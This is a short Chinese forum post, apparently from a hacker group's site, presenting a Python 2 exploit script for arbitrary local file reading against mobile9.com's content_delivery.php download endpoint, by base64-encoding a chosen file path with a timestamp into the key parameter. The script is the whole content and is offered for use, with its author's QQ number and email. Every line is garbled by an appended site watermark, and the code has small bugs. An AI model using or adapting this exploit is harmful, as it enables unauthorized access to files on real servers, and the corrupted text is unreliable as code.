因为他是base64编码的手工测试很麻烦就写了个小工具,高手飘过j4i中国红客联盟-全球最大的红客组织

import urllib2,sysj4i中国红客联盟-全球最大的红客组织
import httplibj4i中国红客联盟-全球最大的红客组织
import base64,timej4i中国红客联盟-全球最大的红客组织

if len(sys.argv) <= 2:j4i中国红客联盟-全球最大的红客组织
        print "=" * 30j4i中国红客联盟-全球最大的红客组织
        print "mobile9.com local exploit by cnb|rd Qq:441303228"j4i中国红客联盟-全球最大的红客组织
        print "Email:Linuxrootkit2008@gmail.com"j4i中国红客联盟-全球最大的红客组织
        print "=" * 30j4i中国红客联盟-全球最大的红客组织
        printj4i中国红客联盟-全球最大的红客组织
        print "usage: " + sys.argv[0] + " hostname " + " local file "j4i中国红客联盟-全球最大的红客组织
        printj4i中国红客联盟-全球最大的红客组织
        sys.exit(1)j4i中国红客联盟-全球最大的红客组织

host = sys.argv[1]j4i中国红客联盟-全球最大的红客组织
path = sys.argv[2]j4i中国红客联盟-全球最大的红客组织
file = sys.argv[3]j4i中国红客联盟-全球最大的红客组织

h = httplib.HTTP(host)j4i中国红客联盟-全球最大的红客组织
h.putrequest("HEAD", path)j4i中国红客联盟-全球最大的红客组织
h.putheader("Host", host)j4i中国红客联盟-全球最大的红客组织
h.endheaders()j4i中国红客联盟-全球最大的红客组织
okresp, reason, headers = h.getreply()j4i中国红客联盟-全球最大的红客组织
print "=" * 30j4i中国红客联盟-全球最大的红客组织
print host + " Server Banner is " + headers.get("Server")j4i中国红客联盟-全球最大的红客组织
print "=" * 30j4i中国红客联盟-全球最大的红客组织

j4i中国红客联盟-全球最大的红客组织
print "Local file to read is " + filej4i中国红客联盟-全球最大的红客组织
time = int(time.time())j4i中国红客联盟-全球最大的红客组织
serverpath = "/download/content_delivery.php?key="j4i中国红客联盟-全球最大的红客组织
str = str(file) + "|" + str(time) + "|"j4i中国红客联盟-全球最大的红客组织
print strj4i中国红客联盟-全球最大的红客组织
base64file = base64.urlsafe_b64encode(str)j4i中国红客联盟-全球最大的红客组织
requestpath = serverpath + base64filej4i中国红客联盟-全球最大的红客组织
print base64filej4i中国红客联盟-全球最大的红客组织
print requestpathj4i中国红客联盟-全球最大的红客组织
f = httplib.HTTPConnection(host)j4i中国红客联盟-全球最大的红客组织
f.request('GET', requestpath)j4i中国红客联盟-全球最大的红客组织
print f.getresponse().read()j4i中国红客联盟-全球最大的红客组织
f.closej4i中国红客联盟-全球最大的红客组织